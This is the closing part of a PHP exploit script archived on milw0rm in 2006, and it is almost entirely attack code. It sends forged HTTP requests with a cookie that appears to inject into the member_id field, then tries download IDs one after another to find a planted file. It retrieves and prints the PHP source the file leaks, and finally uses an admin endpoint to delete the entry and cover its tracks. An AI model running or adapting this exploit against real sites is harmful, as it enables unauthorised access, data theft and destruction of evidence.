$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$valid_id=0;
for ($i=0; $i<=50; $i++){
$packet ="GET ".$p."downloads.php?ID=".$i." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"DaForno_Imperat"))
{
$valid_id=$i;
}
}
$packet ="GET ".$p."downloads.php?act=dl&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<?PHP",$html);
$temp2=explode("?>",$temp[1]);
echo "<?PHP\r\n".$temp2[0]."\r\n?>";
$packet ="GET ".$p."adm_index.php?mod=edit_dl&act=del&type=file&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "\r\n\r\n\r\nAll Done.. Enjoy..";
break;
}
?>
# milw0rm.com [2006-11-29]